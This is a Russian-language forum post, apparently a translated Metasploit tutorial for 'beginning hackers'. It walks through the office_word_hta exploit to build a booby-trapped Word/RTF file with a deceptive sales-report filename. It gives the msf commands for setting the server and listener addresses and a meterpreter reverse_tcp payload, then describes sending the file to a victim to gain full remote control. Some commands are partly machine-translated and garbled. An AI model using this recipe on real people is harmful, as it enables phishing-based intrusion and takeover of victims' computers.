Основы Metasploit, часть 11: Эксплуатация уязвимостей форматов файлов в MS Office

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
152
Депозит
-8.95$
Добро пожаловать обратно, мои начинающие хакеры!

По мере того, как разработчики операционных систем всё больше внимания уделяют безопасности, эксплойты операционных систем встречаются всё реже. Не настолько редко, чтобы мы их больше не видели (см. ExternalBlue и уязвимость .NET CVE-2017-8759 ), но достаточно редко, чтобы хакеры сосредоточили свои усилия на приложениях и их выходных файлах для эксплуатации. К ним могут относиться файлы PDF, .doc, rtf, .jpg, .lnk и .xls. Такие эксплойты называются эксплойтами «формата файла», поскольку они используют определённый формат файла.

6a4a49_fb8bee7c2e004f9da8effd5f5ae9eae3~mv2.png


В Metasploit имеется множество эксплойтов для этих форматов файлов. Чтобы найти их, перейдите по ссылке:

/usr/share/metasploit-framework/modules/exploits/windows/fileformat

В каталоге Metasploit можно найти множество эксплойтов, соответствующих категории форматов файлов. Один из лучших и самых последних известен как эксплойт Office Word hta.

6a4a49_7ce2a328f6b24a43b8fda7a364227871~mv2.png
Этот эксплойт, впервые обнаруженный в конце 2016 года, позволяет нам создавать тщательно продуманный документ Office, который при открытии жертвой внедряет руткит в ее систему и предоставляет нам полный контроль.

Давайте рассмотрим этот эксплойт в этом уроке.

Шаг №1 Запустите Kali и откройте Metasploit

6a4a49_a1d5351d0f624998bac572e3c7b1f871~mv2.png


Шаг №2. Поиск эксплойта Office Word hta.

Теперь, когда консоль Metasploit открыта, давайте поищем этот эксплойт.

msf> тип поиска: формат файла эксплойта

6a4a49_b88227d18cf040a2b1fd366bfe46e07a~mv2.png
Как видите выше, Metasploit выдал большое количество эксплойтов, но я выделил «Вредоносный Office Word, вредоносный HTA Execution». Именно его мы и будем использовать.

Шаг 3. Загрузите эксплойт Office Word HTA

Давайте теперь загрузим этот эксплойт.

msf > используйте exploit/windows/fileformat/office_word_hta

Теперь, когда эксплойт загружен, давайте посмотрим на информацию об этом эксплойте.

MSF > информация

6a4a49_faa9248cf3974ad8b543ba783206a15b~mv2.png
6a4a49_3cba4a8e7e2c40f9ac166f13c0dcaa7d~mv2.png


Как видите выше, этот эксплойт создаёт вредоносный RTF-файл, который позволит нам выполнить наш код на целевой системе при его открытии. Именно этого мы и хотим!

Шаг №4. Показать параметры

Следующий шаг — рассмотреть наши варианты реализации этой уязвимости.

msf > показать параметры

6a4a49_9b1c3ac959064efda539848de8a69310~mv2.png
Как видите, нам нужно задать ИМЯ ФАЙЛА (по умолчанию msf.doc. Не очень-то скрытно), URIPATH и SRVHOST.

msf > set FILENAME hackersarise_sales_report

msf > set URIPATH hackersarise

msf > установить SRVHOST 192.168.1.115


6a4a49_06c12c023d67480286e6924398af50a2~mv2.png


Шаг №5. Установка полезной нагрузки

Следующий шаг — задать полезную нагрузку, которую мы хотим внедрить в целевую систему при открытии файла. Давайте выберем наш мощный и надёжный /windows/meterpreter/reverse_tcp.

msf > set PAYLOAD windows/meterpreter/reverse_tcp


6a4a49_5766f774a86148af9fbe356b324ec7bc~mv2.png


Когда мы еще раз «покажем параметры», мы увидим, что нам нужно установить полезную нагрузку LHOST.

Давайте установим его в нашу систему Kali

msf > установить LHOST 192.168.1.115

6a4a49_12c060f8ee384068b42d4d7dd3987ad8~mv2.png


Теперь нам остаётся только ввести эксплойт , и Metasploit сгенерирует файл hackersarise_sales_report и поместит его в каталог /root/.msf4/local . Затем он запустит сервер по адресу 192.168.1.115 на порту 8080. Теперь нам остаётся только отправить файл целевой машине, открыть его. Она подключится к нашему серверу, загрузит meterpreter и подключится к нашей системе Kali, предоставляя нам неограниченный доступ к её компьютеру.

6a4a49_e17166f0b6254ea6b291913c07b1b233~mv2.png


Мы должны получить приглашение meterpreter, подобное приведенному выше.
 
Назад
Сверху Снизу